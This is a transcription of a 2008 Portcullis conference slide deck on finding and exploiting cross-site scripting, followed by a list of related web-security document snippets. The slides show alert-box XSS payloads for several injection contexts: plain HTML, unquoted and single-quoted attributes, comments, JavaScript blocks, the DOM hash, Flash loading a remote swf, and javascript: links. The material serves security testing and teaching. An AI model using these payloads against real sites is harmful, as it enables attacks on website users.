Portcullis Computer Security.
|
|
- Lewis Russell
- 5 years ago
- Views:
Transcription
1 Portcullis Computer Security
2 How to detect and exploit %99 of XSS Vulnerabilities 2 April 2008 Portcullis Computer Security Limited 2
3 XSS? So What? Recently XSS has proven to be dangerous enough to consider. And it allows you to jump into VPN or it allows you to bypass firewall rules via XSS Tunnelling. 2 April 2008 Portcullis Computer Security Limited 3
4 What is it about? It s all about where output goes Straight into HTML Into Javascript / VbScript block As tag attribute And some other rare, strange places 2 April 2008 Portcullis Computer Security Limited 4
5 Understanding exploiting XSS It s like SQL injection but now our subsystem is not a database it s a browser and instead of a single quote we ve got some new meta characters. 2 April 2008 Portcullis Computer Security Limited 5
6 Ultimate Challenge Ultimate challenge of XSS issues is able to escape current block and make browsers render your piece of code. 2 April 2008 Portcullis Computer Security Limited 6
7 XSS Types These are most common XSS examples which you are going to see in the wild. I ll try to show a demo to exploit them. HTML Normal HTML Attribute without quotes HTML Attribute with single quotes HTML In Comments HTML In Javascript Blocks DOM based XSS Flash based XSS Direct Linking 2 April 2008 Portcullis Computer Security Limited 7
8 Not Covered Before jumping into exploiting these specific issues; Following rare but has seen concepts are not covered in this talk. XAS Cross Application Scripting Security Zones of IE Client-Site issues like.jar problem Advanced Flash Analyzes for XSS Exploiting XSS in real world Bypassing HTML parsing based XSS filters like gmail, myspace etc. 2 April 2008 Portcullis Computer Security Limited 8
9 HTML - Normal Most common XSS type, At least it was the most common one. But nowadays most of the developers aware of it. In this demo we assumed there is no filtering in the server-side. 2 April 2008 Portcullis Computer Security Limited 9
10 HTML - Normal DEMO <s cr i pt >a l er t ( 0x1) </ s cr i pt > 2 April 2008 Portcullis Computer Security Limited 10
11 HTML Attributes without Quotes When output used as an HTML attribute in the application, if it s coded in a sloppy HTML which has no quotes around it even if there is a server-side filtering we can bypass it! 2 April 2008 Portcullis Computer Security Limited 11
12 HTML Attributes without Quotes DEMO %20onl oa d=a l er t ( 0x2) %20 2 April 2008 Portcullis Computer Security Limited 12
13 HTML Attributes with Single Quotes Wrapping HTML attributes with a single quote is quite common, valid but a poor practice. Since single quote is not considered as HTML meta character is not encoded by any of default XSS filter functions like html_entities() or Server.HTMLEncode() 2 April 2008 Portcullis Computer Security Limited 13
14 HTML Attributes with Single Quotes DEMO onl oa d=a l er t ( 0x3) 2 April 2008 Portcullis Computer Security Limited 14
15 HTML In Comments If output goes into an HTML comment we need > closing tag. This will be encoded by default filters, so it should be unfiltered. 2 April 2008 Portcullis Computer Security Limited 15
16 HTML In Comments DEMO - -! ><s cr i pt >a l er t ( 0x4) </ s cr i pt > 2 April 2008 Portcullis Computer Security Limited 16
17 HTML Javascript Blocks Javascript blocks are too dangerous because meta characters are changing in there. If output goes into javascript we are not tag opener any more or double quotes. It all depends where it goes in Javascript, we may need a single quote, may need a double quotes or maybe only a space or semi column. 2 April 2008 Portcullis Computer Security Limited 17
18 HTML In Comments DEMO ; al er t ( 0x5) 2 April 2008 Portcullis Computer Security Limited 18
19 HTML DOM Based This is one of the most rare and hard to spot XSS types. You need a simple source code analyse over the script code. Most of DOM based XSS issues can not be identified by automated scanners (to( be honest non of them!) 2 April 2008 Portcullis Computer Security Limited 19
20 HTML In Comments DEMO #al er t ( 0x6) 2 April 2008 Portcullis Computer Security Limited 20
21 HTML Flash Based XSS It s being more and more popular There are several ways to see an XSS issue in Flash but most common ones Remote flash file loading Direct Linking Flash application generally load remote resources and if this resources can be controlled by parameters then it can be called directly and can be forced to call a remote malisious flash object. 2 April 2008 Portcullis Computer Security Limited 21
22 HTML Flash Based XSS DEMO vul n. s wf? pl ayer =ht t p: / / example. com/xs s. s wf _get URL( j avas cr i pt : al er t ( 0x7) _get URL( j avas cr i pt : al er t ( 0x7) ) 2 April 2008 Portcullis Computer Security Limited 22
23 HTML Direct Linking If linking functionality exist almost, always vulnerable to this attack! It can be something like Your address Homepage URL Your photo URL etc. 2 April 2008 Portcullis Computer Security Limited 23
24 HTML Flash Based XSS DEMO j avasa cr i pt : al er t ( 0x8) 2 April 2008 Portcullis Computer Security Limited 24
25 Final Words If a XSS issue is exploitable in Internet Explorer it s highly possibly exploitable in Mozilla based browser, attack vector may differs. CSS expr es s i on( ) and moz- bi ndi ng can allow you to trigger XSS payloads onload 2 April 2008 Portcullis Computer Security Limited 25
26 Final Words Know what you send Your browser can do some encoding which may invalidate your XSS test To able to exploit target server you may need to send HTML characters without proper encoding Confirm what you send from your proxy and be sure you tested it with encoding and without encoding 2 April 2008 Portcullis Computer Security Limited 26
27 vbs cr i pt : msgbox( A ny Questi ons? ) 2 April 2008 Portcullis Computer Security Limited 27
CNIT 129S: Securing Web Applications. Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2
CNIT 129S: Securing Web Applications Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2 Finding and Exploiting XSS Vunerabilities Basic Approach Inject this string into every parameter on every
More informationWeb 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007
Web 2.0 and AJAX Security OWASP Montgomery August 21 st, 2007 Overview Introduction Definition of Web 2.0 Basics of AJAX Attack Vectors for AJAX Applications AJAX and Application Security Conclusions 1
More informationWeb Security: Vulnerabilities & Attacks
Computer Security Course. Song Dawn Web Security: Vulnerabilities & Attacks Cross-site Scripting What is Cross-site Scripting (XSS)? Vulnerability in web application that enables attackers to inject client-side
More informationOverview Cross-Site Scripting (XSS) Christopher Lam Introduction Description Programming Languages used Types of Attacks Reasons for XSS Utilization Attack Scenarios Steps to an XSS Attack Compromises
More informationComputer Security 3e. Dieter Gollmann. Chapter 18: 1
Computer Security 3e Dieter Gollmann www.wiley.com/college/gollmann Chapter 18: 1 Chapter 18: Web Security Chapter 18: 2 Web 1.0 browser HTTP request HTML + CSS data web server backend systems Chapter
More informationMWR InfoSecurity Advisory. 26 th April Elastic Path Administrative. Quit. Session Hijacking through Embedded XSS
Quit MWR InfoSecurity Advisory Elastic Path Administrative Session Hijacking through Embedded XSS 26 th April 2007 2007-04-26 1 of 7 INDEX 1 Detailed Vulnerability description...4 1.1 Introduction...4
More informationWEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang
WEB SECURITY WORKSHOP TEXSAW 2014 Presented by Solomon Boyd and Jiayang Wang Introduction and Background Targets Web Applications Web Pages Databases Goals Steal data Gain access to system Bypass authentication
More informationNotes From The field
Notes From The field tools and usage experiences Jarkko Holappa Antti Laulajainen Copyright The Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the License.
More informationXML. Jonathan Geisler. April 18, 2008
April 18, 2008 What is? IS... What is? IS... Text (portable) What is? IS... Text (portable) Markup (human readable) What is? IS... Text (portable) Markup (human readable) Extensible (valuable for future)
More informationClient Side Injection on Web Applications
Client Side Injection on Web Applications Author: Milad Khoshdel Blog: https://blog.regux.com Email: miladkhoshdel@gmail.com 1 P a g e Contents INTRODUCTION... 3 HTML Injection Vulnerability... 4 How to
More informationUser Input Piercing For Cross-site Scripting Attacks OWASP 11/12/2009. The OWASP Foundation Matias Blanco
User Input Piercing For Cross-site Scripting Attacks Matias Blanco 11/12/2009 Core Security Technologies blue@corest.com (05411) 5556-2673 The Foundation http://www.owasp.org Index Introduction Injection
More informationApplication vulnerabilities and defences
Application vulnerabilities and defences In this lecture We examine the following : SQL injection XSS CSRF SQL injection SQL injection is a basic attack used to either gain unauthorized access to a database
More informationWeb Security, Part 2
Web Security, Part 2 CS 161 - Computer Security Profs. Vern Paxson & David Wagner TAs: John Bethencourt, Erika Chin, Matthew Finifter, Cynthia Sturton, Joel Weinberger http://inst.eecs.berkeley.edu/~cs161/
More informationGOING WHERE NO WAFS HAVE GONE BEFORE
GOING WHERE NO WAFS HAVE GONE BEFORE Andy Prow Aura Information Security Sam Pickles Senior Systems Engineer, F5 Networks NZ Agenda: WTF is a WAF? View from the Trenches Example Attacks and Mitigation
More informationThe security of Mozilla Firefox s Extensions. Kristjan Krips
The security of Mozilla Firefox s Extensions Kristjan Krips Topics Introduction The extension model How could extensions be used for attacks - website defacement - phishing attacks - cross site scripting
More informationWe will show you how we bypassed every XSS mitigation we tested. Mitigation bypass-ability via script gadget chains in 16 popular libraries
We will show you how we bypassed every XSS mitigation we tested. Mitigation bypass-ability via script gadget chains in 16 popular libraries PoCs included Content Security Policy WAFs whitelists nonces
More informationApplication Layer Attacks. Application Layer Attacks. Application Layer. Application Layer. Internet Protocols. Application Layer.
Application Layer Attacks Application Layer Attacks Week 2 Part 2 Attacks Against Programs Application Layer Application Layer Attacks come in many forms and can target each of the 5 network protocol layers
More informationCSCE 813 Internet Security Case Study II: XSS
CSCE 813 Internet Security Case Study II: XSS Professor Lisa Luo Fall 2017 Outline Cross-site Scripting (XSS) Attacks Prevention 2 What is XSS? Cross-site scripting (XSS) is a code injection attack that
More informationWeb Security. Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le
Web Security Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le Topics Web Architecture Parameter Tampering Local File Inclusion SQL Injection XSS Web Architecture Web Request Structure Web Request Structure
More informationCommon Websites Security Issues. Ziv Perry
Common Websites Security Issues Ziv Perry About me Mitnick attack TCP splicing Sql injection Transitive trust XSS Denial of Service DNS Spoofing CSRF Source routing SYN flooding ICMP
More informationPractical Automated Web Application Attack Techniques Justin Clarke Gotham Digital Science Gotham Digital Science Ltd
Practical Automated Web Application Attack Techniques Justin Clarke Gotham Digital Science Why this talk? The techniques are well known, but how about some way of applying ppy them? Commercial tools are
More informationHTML 5 and CSS 3, Illustrated Complete. Unit L: Programming Web Pages with JavaScript
HTML 5 and CSS 3, Illustrated Complete Unit L: Programming Web Pages with JavaScript Objectives Explore the Document Object Model Add content using a script Trigger a script using an event handler Create
More informationCHAPTER 8 CONCLUSION AND FUTURE ENHANCEMENTS
180 CHAPTER 8 CONCLUSION AND FUTURE ENHANCEMENTS 8.1 SUMMARY This research has focused on developing a Web Applications Secure System from Code Injection Vulnerabilities through Web Services (WAPS-CIVS),
More informationUnusual Web Bugs. A Web App Hacker s Bag O Tricks. Alex kuza55 K.
Unusual Web Bugs A Web App Hacker s Bag O Tricks Alex kuza55 K. kuza55@gmail.com http://kuza55.blogspot.com/ I'm Alex Starting Uni next year Working for SIFT http://www.sift.com.au/ This talk is Not an
More informationWeb Application Security
Web Application Security Rajendra Kachhwaha rajendra1983@gmail.com October 16, 2015 Lecture 16: 1/ 14 Outline Browser Security Principles: 1 Cross Site Scripting (XSS) 2 Types of XSS 3 Lecture 16: 2/ 14
More informationWeb Application with AJAX. Kateb, Faris; Ahmed, Mohammed; Alzahrani, Omar. University of Colorado, Colorado Springs
Web Application with AJAX Kateb, Faris; Ahmed, Mohammed; Alzahrani, Omar University of Colorado, Colorado Springs CS 526 Advanced Internet and Web Systems Abstract Asynchronous JavaScript and XML or Ajax
More informationAbusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side)
Abusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side) Narendra Bhati @NarendraBhatiB http://websecgeeks.com Abusing Windows Opener To Bypass CSRF Protection Narendra Bhati Page
More informationCSCD 303 Essential Computer Security Fall 2018
CSCD 303 Essential Computer Security Fall 2018 Lecture 17 XSS, SQL Injection and CRSF Reading: See links - End of Slides Overview Idea of XSS, CSRF and SQL injection is to violate security of Web Browser/Server
More informationPrevention Of Cross-Site Scripting Attacks (XSS) On Web Applications In The Client Side
www.ijcsi.org 650 Prevention Of Cross-Site Scripting Attacks (XSS) On Web Applications In The Client Side S.SHALINI 1, S.USHA 2 1 Department of Computer and Communication, Sri Sairam Engineering College,
More informationshortcut Tap into learning NOW! Visit for a complete list of Short Cuts. Your Short Cut to Knowledge
shortcut Your Short Cut to Knowledge The following is an excerpt from a Short Cut published by one of the Pearson Education imprints. Short Cuts are short, concise, PDF documents designed specifically
More informationWeb Application Attacks
Web Application Attacks What can an attacker do and just how hard is it? By Damon P. Cortesi IOActive, Inc. Comprehensive Computer Security Services www.ioactive.com cortesi:~
More informationPreparing for the Cross Site Request Forgery Defense
Preparing for the Cross Site Request Forgery Defense By Chuck Willis chuck.willis@mandiant.com Presented at Black Hat Briefings DC 2008 on February 20, 2008 Slides available at www.blackhat.com. Abstract:
More informationRiding out DOMsday: Toward Detecting and Preventing DOM Cross-Site Scripting. William Melicher Anupam Das Mahmood Sharif Lujo Bauer Limin Jia
Riding out DOMsday: Toward Detecting and Preventing DOM Cross-Site Scripting William Melicher Anupam Das Mahmood Sharif Lujo Bauer Limin Jia XSS vulnerabilities account for 25% of web vulnerabilities url.com/page#">attack
More informationFinding Vulnerabilities in Web Applications
Finding Vulnerabilities in Web Applications Christopher Kruegel, Technical University Vienna Evolving Networks, Evolving Threats The past few years have witnessed a significant increase in the number of
More informationINF3700 Informasjonsteknologi og samfunn. Application Security. Audun Jøsang University of Oslo Spring 2015
INF3700 Informasjonsteknologi og samfunn Application Security Audun Jøsang University of Oslo Spring 2015 Outline Application Security Malicious Software Attacks on applications 2 Malicious Software 3
More informationRKN 2015 Application Layer Short Summary
RKN 2015 Application Layer Short Summary HTTP standard version now: 1.1 (former 1.0 HTTP /2.0 in draft form, already used HTTP Requests Headers and body counterpart: answer Safe methods (requests): GET,
More informationInformation Security CS 526 Topic 11
Information Security CS 526 Topic 11 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive
More informationCS 142 Winter Session Management. Dan Boneh
CS 142 Winter 2009 Session Management Dan Boneh Sessions A sequence of requests and responses from one browser to one (or more) sites Session can be long (Gmail - two weeks) or short without session mgmt:
More informationWeb Security: XSS; Sessions
Web Security: XSS; Sessions CS 161: Computer Security Prof. Raluca Ada Popa Mar 22, 2018 Credit: some slides are adapted from previous offerings of this course or from CS 241 of Prof. Dan Boneh SQL Injection
More information7.2.4 on Media content; on XSS) sws2 1
Software and Web Security 2 Attacks on Clients (Section 7.1.3 on JavaScript; 7.2.4 on Media content; 7.2.6 on XSS) sws2 1 Last week: web server can be attacked by malicious input web browser web server
More informationComputer Security CS 426 Lecture 41
Computer Security CS 426 Lecture 41 StuxNet, Cross Site Scripting & Cross Site Request Forgery CS426 Fall 2010/Lecture 36 1 StuxNet: Overview Windows-based Worm First reported in June 2010, the general
More informationCSCD 303 Essential Computer Security Fall 2017
CSCD 303 Essential Computer Security Fall 2017 Lecture 18a XSS, SQL Injection and CRSF Reading: See links - End of Slides Overview Idea of XSS, CSRF and SQL injection is to violate the security of the
More informationSome Facts Web 2.0/Ajax Security
/publications/notes_and_slides Some Facts Web 2.0/Ajax Security Allen I. Holub Holub Associates allen@holub.com Hackers attack bugs. The more complex the system, the more bugs it will have. The entire
More informationManipulating Web Application Interfaces a New Approach to Input Validation Testing. AppSec DC Nov 13, The OWASP Foundation
Manipulating Web Application Interfaces a New Approach to Input Validation Testing Felipe Moreno-Strauch AppSec DC Nov 13, 2009 felipe@wobot.org http://groundspeed.wobot.org The Foundation http://www.owasp.org
More informationWeb Security II. Slides from M. Hicks, University of Maryland
Web Security II Slides from M. Hicks, University of Maryland Recall: Putting State to HTTP Web application maintains ephemeral state Server processing often produces intermediate results; not long-lived
More informationLab 5: Web Attacks using Burp Suite
Lab 5: Web Attacks using Burp Suite Aim The aim of this lab is to provide a foundation in performing security testing of web applications using Burp Suite and its various tools. Burp Suite and its tools
More informationCSC 405 Computer Security. Web Security
CSC 405 Computer Security Web Security Alexandros Kapravelos akaprav@ncsu.edu (Derived from slides by Giovanni Vigna and Adam Doupe) 1 Cross-Site Scripting (XSS) XSS attacks are used to bypass JavaScript's
More informationIntroduction to Ethical Hacking
Introduction to Ethical Hacking Summer University 2017 Seoul, Republic of Korea Alexandre Karlov Today Some tools for web attacks Wireshark How a writeup looks like 0x04 Tools for Web attacks Overview
More informationWeb basics: HTTP cookies
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh February 11, 2016 1 / 27 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the
More informationBOOSTING THE SECURITY OF YOUR ANGULAR 2 APPLICATION
BOOSTING THE SECURITY OF YOUR ANGULAR 2 APPLICATION Philippe De Ryck NG-BE Conference, December 9 th 2016 https://www.websec.be ABOUT ME PHILIPPE DE RYCK My goal is to help you build secure web applications
More informationmincss Documentation Release 0.1 Peter Bengtsson
mincss Documentation Release 0.1 Peter Bengtsson Sep 27, 2017 Contents 1 Getting started 3 2 Supported Features and Limitations 5 3 API 7 4 Changelog 9 4.1 v0.8.1 (2013-04-05)...........................................
More informationWeb Security, Summer Term 2012
Table of Contents IIG University of Freiburg Web Security, Summer Term 2012 Cross Site Scripting - XSS Dr. E. Benoist Sommer Semester Presentation: Inject Javascript in a Page Javascript for manipulating
More informationWeb Security, Summer Term 2012
IIG University of Freiburg Web Security, Summer Term 2012 Cross Site Scripting - XSS Dr. E. Benoist Sommer Semester Web Security, Summer Term 2012 5 Cross Site Scripting 1 Table of Contents Presentation:
More informationHow is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh March 30, 2015 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the server sends
More informationWEB APPLICATION PENETRATION TESTING EXTREME VERSION 1
WEB APPLICATION PENETRATION TESTING EXTREME VERSION 1 The most advanced course on web application penetration testing elearnsecurity has been chosen by students in over 140 countries in the world and by
More informationProgress Exchange June, Phoenix, AZ, USA 1
1 COMP-1: Securing your web application against hackers Edwin Lijnzaad & Ronald Smits Consultants Agenda Introduction Issues How to... Questions 2 COMP-1: Securing your web application against hackers
More informationWeb Penetration Testing
Web Penetration Testing What is a Website How to hack a Website? Computer with OS and some servers. Apache, MySQL...etc Contains web application. PHP, Python...etc Web application is executed here and
More informationYour Turn to Hack the OWASP Top 10!
OWASP Top 10 Web Application Security Risks Your Turn to Hack OWASP Top 10 using Mutillidae Born to Be Hacked Metasploit in VMWare Page 1 https://www.owasp.org/index.php/main_page The Open Web Application
More informationPenetration Test Report
Penetration Test Report Feb 12, 2018 Ethnio, Inc. 6121 W SUNSET BLVD LOS angeles, CA 90028 Tel (888) 879-7439 ETHN.io Summary This document contains the most recent pen test results from our third party
More informationWeb Application Vulnerabilities: OWASP Top 10 Revisited
Pattern Recognition and Applications Lab Web Application Vulnerabilities: OWASP Top 10 Revisited Igino Corona igino.corona AT diee.unica.it Computer Security April 5th, 2018 Department of Electrical and
More informationRemote social engineering techniques involving Microsoft Universal Naming Convention (UNC) function.
10 March 2016 Remote social engineering techniques involving Microsoft Universal Naming Convention (UNC) function. Presented by Neil Lines Who am I? Neil Lines - Pen Tester Involved in a range of security
More informationCSP ODDITIES. Michele Spagnuolo Lukas Weichselbaum
ODDITIES Michele Spagnuolo Lukas Weichselbaum ABOUT US Michele Spagnuolo Lukas Weichselbaum Information Security Engineer Information Security Engineer We work in a special focus area of the Google security
More informationFinancial. AngularJS. AngularJS.
Financial http://killexams.com/exam-detail/ Section 1: Sec One (1 to 50) Details:This section provides a huge collection of Angularjs Interview Questions with their answers hidden in a box to challenge
More informationCIS 4360 Secure Computer Systems XSS
CIS 4360 Secure Computer Systems XSS Professor Qiang Zeng Spring 2017 Some slides are adapted from the web pages by Kallin and Valbuena Previous Class Two important criteria to evaluate an Intrusion Detection
More informationWeb Security: Vulnerabilities & Attacks
Computer Security Course. Web Security: Vulnerabilities & Attacks Type 2 Type 1 Type 0 Three Types of XSS Type 2: Persistent or Stored The attack vector is stored at the server Type 1: Reflected The attack
More informationFinancial. AngularJS. AngularJS. Download Full Version :
Financial AngularJS AngularJS Download Full Version : https://killexams.com/pass4sure/exam-detail/angularjs Section 1: Sec One (1 to 50) Details:This section provides a huge collection of Angularjs Interview
More informationCross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems
Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems Browser same origin policy Key security principle: a web browser permits scripts contained in a first web
More informationWeb basics: HTTP cookies
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh November 20, 2017 1 / 32 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the
More informationIs Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection
Is Browsing Safe? Web Browser Security Charlie Reis Guest Lecture - CSE 490K - 5/24/2007 Send Spam Search Results Change Address? Install Malware Web Mail Movie Rentals 2 Browser Security Model Pages are
More informationLecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422
Lecture 17 Browser Security Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422 Documents Browser's fundamental role is to display documents comprised
More informationSecurity. CSC309 TA: Sukwon Oh
Security CSC309 TA: Sukwon Oh Outline SQL Injection NoSQL Injection (MongoDB) Same Origin Policy XSSI XSS CSRF (XSRF) SQL Injection What is SQLI? Malicious user input is injected into SQL statements and
More informationA D V I S O R Y S E R V I C E S. Web Application Assessment
A D V I S O R Y S E R V I C E S Web Application Assessment March 2009 Agenda Definitions Landscape of current web applications Required skills Attack surface Scope Methodology Soft skills 2 Definitions
More informationJacksonville Linux User Group Presenter: Travis Phillips Date: 02/20/2013
Jacksonville Linux User Group Presenter: Travis Phillips Date: 02/20/2013 Welcome Back! A Quick Recap of the Last Presentation: Overview of web technologies. What it is. How it works. Why it s attractive
More informationInformation Security CS 526 Topic 8
Information Security CS 526 Topic 8 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive
More informationNET 311 INFORMATION SECURITY
NET 311 INFORMATION SECURITY Networks and Communication Department Lec12: Software Security / Vulnerabilities lecture contents: o Vulnerabilities in programs Buffer Overflow Cross-site Scripting (XSS)
More informationINJECTING SECURITY INTO WEB APPS WITH RUNTIME PATCHING AND CONTEXT LEARNING
INJECTING SECURITY INTO WEB APPS WITH RUNTIME PATCHING AND CONTEXT LEARNING AJIN ABRAHAM SECURITY ENGINEER #WHOAMI Security Engineering @ Research on Runtime Application Self Defence Authored MobSF, Xenotix
More informationExploiting Unicode-enabled Software. Chris Weber Casaba Security
Exploiting Unicode-enabled Software Chris Weber Casaba Security www.casabasecurity.com Overview Attacks and Exploits Root Causes Case Studies TR# 36 highlight TR# 39 highlight Demos Areas for further Testing
More informationOpening Intranets to attacks by using Internet Explorer
Opening Intranets to attacks by using Internet Explorer Author: Cesar Cerrudo (cesar>.at..dot.
More informationW e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s
W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s Session I of III JD Nir, Security Analyst Why is this important? ISE Proprietary Agenda About ISE Web Applications
More informationLarge-Scale Analysis of Style Injection by Relative Path Overwrite
Large-Scale Analysis of Style Injection by Relative Path Overwrite Sajjad Arshad, Seyed Ali Mirheidari, Tobias Lauinger, Bruno Crispo, Engin Kirda, William Robertson WWW - 26 April 2018 Relative Path Overwrite
More informationStopping Automated Application Attack Tools
Stopping Automated Application Attack Tools Black Hat 2006 - Amsterdam March, 2006 Gunter Ollmann Director of X-Force Internet Security Systems Introduction Automated Attack Methods Common Protection Strategies
More informationIronWASP (Iron Web application Advanced Security testing Platform)
IronWASP (Iron Web application Advanced Security testing Platform) 1. Introduction: IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability
More informationEthical Hacking and Countermeasures: Web Applications, Second Edition. Chapter 3 Web Application Vulnerabilities
Ethical Hacking and Countermeasures: Web Chapter 3 Web Application Vulnerabilities Objectives After completing this chapter, you should be able to: Understand the architecture of Web applications Understand
More informationWHY CSRF WORKS. Implicit authentication by Web browsers
WHY CSRF WORKS To explain the root causes of, and solutions to CSRF attacks, I need to share with you the two broad types of authentication mechanisms used by Web applications: 1. Implicit authentication
More informationBOOSTING THE SECURITY
BOOSTING THE SECURITY OF YOUR ANGULAR APPLICATION Philippe De Ryck March 2017 https://www.websec.be ANGULAR APPLICATIONS RUN WITHIN THE BROWSER JS code HTML code Load application JS code / HTML code JS
More informationFIRE-FOX XSS PREVENTION
Zhen Huang Nikolay Pavlovich Laptev Jason Liu FIRE-FOX XSS PREVENTION I. INTRODUCTION In recent years XSS attacks have become more widespread due to the growing popularity of AJAX and other dynamic web
More informationProject 2: Web Security
EECS 388 September 30, 2016 Intro to Computer Security Project 2: Web Security Project 2: Web Security This project is due on Thursday, October 13 at 6 p.m. and counts for 8% of your course grade. Late
More informationAssignment 6: Web Security
COS 432 November 20, 2017 Information Security Assignment 6: Web Security Assignment 6: Web Security This project is due on Monday, December 4 at 11:59 p.m.. Late submissions will be penalized by 10% per
More informationInjectable Exploits. New Tools for Pwning Web Apps and Browsers
Injectable Exploits New Tools for Pwning Web Apps and Browsers Kevin Johnson kevin@inguardians.com Justin Searle justin@inguardians.com Frank DiMaggio frank@secureideas.net 1 Who are we? Kevin Johnson
More informationLecture Overview. IN5290 Ethical Hacking
Lecture Overview IN5290 Ethical Hacking Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks Universitetet i Oslo Laszlo Erdödi How to use Burp
More informationLecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks
IN5290 Ethical Hacking Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks Universitetet i Oslo Laszlo Erdödi Lecture Overview How to use Burp
More informationCaffeine Monkey. Automated Collection, Detection and Analysis of Malicious JavaScript. Ben Feinstein, CISSP Daniel Peck SecureWorks, Inc.
Caffeine Monkey Automated Collection, Detection and Analysis of Malicious JavaScript Ben Feinstein, CISSP Daniel Peck SecureWorks, Inc. Feinstein & Peck Black Hat USA 2007 1 Introductions Welcome to Black
More informationCS50 Quiz Review. November 13, 2017
CS50 Quiz Review November 13, 2017 Info http://docs.cs50.net/2017/fall/quiz/about.html 48-hour window in which to take the quiz. You should require much less than that; expect an appropriately-scaled down
More informationClient Side Security And Testing Tools
OWASP Jakarta Tech Day Meetup 2017 Client Side Security And Testing Tools David Cervigni @ Minded Security Agenda Short Intro Client side threats: Why important/difficult Examples: Dom XSS, HTTP Param
More informationContent Security Policy
About Tim Content Security Policy New Tools for Fighting XSS Pentester > 10 years Web Applications Network Security Products Exploit Research Founded Blindspot Security in 2014 Pentesting Developer Training
More informationBug-Alcoholic Untamed World of Web Vulnerabilities. OWASP AppSec 2010, University of California Irvine, CA, USA September 10, 2010
Bug-Alcoholic 2.0 - Untamed World of Web Vulnerabilities OWASP AppSec 2010, University of California Irvine, CA, USA September 10, 2010 Aditya K Sood SecNiche Security Labs Sr. Security Practitioner, Armorize
More informationWebapps Vulnerability Report
Webapps Vulnerability Report Tuesday, January 12, 2010 Introduction This report provides detailed information of every vulnerability that was found and successfully exploited by CORE IMPACT during this
More informationBeijing , China. Keywords: Web system, XSS vulnerability, Filtering mechanisms, Vulnerability scanning.
2017 International Conference on Computer, Electronics and Communication Engineering (CECE 2017) ISBN: 978-1-60595-476-9 XSS Vulnerability Scanning Algorithm Based on Anti-filtering Rules Bo-wen LIU 1,
More informationCS 161 Computer Security
Paxson Spring 2017 CS 161 Computer Security Discussion 4 Week of February 13, 2017 Question 1 Clickjacking (5 min) Watch the following video: https://www.youtube.com/watch?v=sw8ch-m3n8m Question 2 Session
More informationAdvanced Web Technology 10) XSS, CSRF and SQL Injection
Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 1 Table of Contents Cross Site Request Forgery - CSRF Presentation
More information